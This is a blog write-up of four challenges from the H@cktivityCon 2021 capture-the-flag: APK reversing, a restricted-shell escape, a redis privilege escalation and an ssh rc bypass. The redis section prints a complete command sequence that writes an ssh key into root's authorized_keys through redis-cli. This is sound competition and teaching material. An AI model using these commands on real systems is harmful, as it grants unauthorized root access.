Table of Contents
H@cktivityCon 2021 was happening over the weekend and I participated in their ctf with team @fr334aks . We managed position 49 out of 2527 teams. This writeup is of the challenges I managed to solve.
1. Mobile: To Do⌗
We are provided with an apk file. First thing I typically do with apk files is open them with jadx-gui.
Here I first look at the AndroidManifest.xml to see the application entry point.
For this app it’s LoginActivity. It checks if the input provided is equal to
testtest and if true it goes on to load MainActivity.
When we install the application and supply the password as
testtest we get the flag.
Unfortunately I couldn’t copy it out and typing it would have been a pain. Back on the MainActivity we see it loads MyDatabase.
When we look at MyDatabase, it loads an sqlite database
todos.db. A lot of the times sqlitedb database in android apps are stored within
Extracting the apk using apktool I was able to access the sqlitedb and extract the flag.
2. Miscellaneous: Shelle⌗
When we connect to the challenge, we get access to a restricted shell with only a few commands we can run.
When we read the assignment, we are told the flag is in the /opt directory.
Unfortunately we can’t access it.
Next I tried to see if we can access any environment variables and see if the
$ character is forbidden as well.
Luckily this works.
I then ran
set to list all environment variables. Looking through the list I saw one set to bash.
I was able to use it to escape the restricted shell and read the flag.
3. Miscellaneous: Redlike⌗
After sshing into the challenge machine, I performed some local enumeration and when checking for running processes we see redis running locally as root. Clearly this is the privesc path.
I immediately jumped to hacktricks and used the below commands to escalate privileges.
ssh-keygen -f redis (echo -e "\n\n"; cat redis.pub; echo -e "\n\n") > spaced_key.txt cat spaced_key.txt | redis-cli -h 127.0.0.1 -x set ssh_key redis-cli -h 127.0.0.1 config set dir /root/.ssh config set dbfilename "authorized_keys" save chmod 600 redis ssh -i redis email@example.com
4. Miscellaneous: Race Car⌗
I enjoyed this one as I was the second to solve it.
When we ssh into the challenge machine, the session is immediately closed when we provide the password.
I tried different techniques I knew for restricted shell bypass with ssh but none worked. I got an idea to use sftp and see what configuration files could be causing this behaviour.
With sftp we are not kicked out and can look at files. Two files seem to be of interest but only
rc in .ssh has contents.
The rc file is the one responsible for getting us kicked out. I tried deleting it but that didn’t work. However, since we have write permissions, I was able to overwrite it by uploading an empty file with the same name.
Once that was done we can ssh and get the flag.
Thanks HackerOne, John Hammond and the CTF challenge creators, it was a fun one!